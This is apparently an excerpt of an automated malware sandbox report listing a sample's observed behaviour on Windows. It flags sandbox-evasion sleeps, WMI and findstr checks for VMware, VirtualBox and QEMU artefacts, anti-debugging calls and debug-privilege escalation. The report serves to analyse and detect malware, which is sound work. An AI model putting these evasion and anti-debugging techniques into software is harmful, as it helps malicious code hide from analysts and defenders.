Source: C:\Windows\System32\svchost.exe TID: 3264	Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6240	Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6240	Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6336	Thread sleep count: 309 > 30
Source: C:\Windows\System32\svchost.exe TID: 6336	Thread sleep time: -30900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6448	Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 6448	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6516	Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 6688	Thread sleep count: 294 > 30

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894 FindFirstFileExW,	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894 FindFirstFileExW,	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894 FindFirstFileExW,	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894 FindFirstFileExW,	37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894 FindFirstFileExW,	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894 FindFirstFileExW,	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894 FindFirstFileExW,	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894 FindFirstFileExW,	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894 FindFirstFileExW,	40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894 FindFirstFileExW,	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894 FindFirstFileExW,	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894 FindFirstFileExW,	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894 FindFirstFileExW,	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894 FindFirstFileExW,	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894 FindFirstFileExW,	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894 FindFirstFileExW,	44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894 FindFirstFileExW,	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894 FindFirstFileExW,	46_2_000002295D56D894

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 00000030.00000002.3005591334.000001845AC2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: cmd.exe, 00000013.00000003.2083609583.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085257031.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085855678.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084489555.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084133578.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086602704.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082690674.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085736368.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082095231.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086221722.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0T2B0A" /c:"QEMU HARDDISK" K
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.50.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000029.00000000.2461945844.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.50.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: cmd.exe, 00000013.00000003.2069301255.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2069201279.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemuwmi2y
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3012792794.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmusrvc2y
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000032.00000000.2531567610.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxMouse.sys
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.50.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000028.00000002.3004375216.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454613011.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2984423771.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2461883353.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2487807964.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2985218282.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2984681967.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000000.2491864089.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2505327301.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3006995686.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000032.00000000.2527082224.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000029.00000000.2462217296.000002A660662000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000039.00000002.2984538693.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger

Checks if the current process is being debugged

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugObjectHandle

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

19_2_000002241390CD80

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,

19_2_0000022413901E3C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413901D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

19_2_0000022413901D30

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
